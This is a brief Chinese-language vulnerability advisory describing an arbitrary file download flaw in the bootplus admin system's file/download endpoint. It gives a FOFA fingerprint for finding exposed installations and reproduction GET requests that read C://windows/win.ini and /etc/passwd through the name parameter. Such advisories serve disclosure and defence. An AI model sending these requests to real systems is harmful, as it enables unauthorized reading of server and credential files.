bootplus管理系统 file/download 任意文件下载漏洞

漏洞描述

        bootplus是基于SpringBoot + Shiro + MyBatisPlus的，拥有接口管理，权限管理，监控组件等功能的一体化权限管理框架。该项目中的file/download接口存在任意文件下载漏洞， 攻击者可以通过该漏洞下载查看目标系统的任意文件。

威胁等级: 高危

漏洞分类: 任意文件读取

涉及厂商及产品：bootplus

是否开源：是

应用指纹及检出思路

匹配源代码/statics/css/admin/AdminLTE.min.css 即可

fofa : body="/statics/css/admin/AdminLTE.min.css"

漏洞复现

GET /file/download?name=C://windows/win.ini&real=1 HTTP/1.1
Host: 127.0.0.1:8090 

GET /file/download?name=/etc/passwd&real=1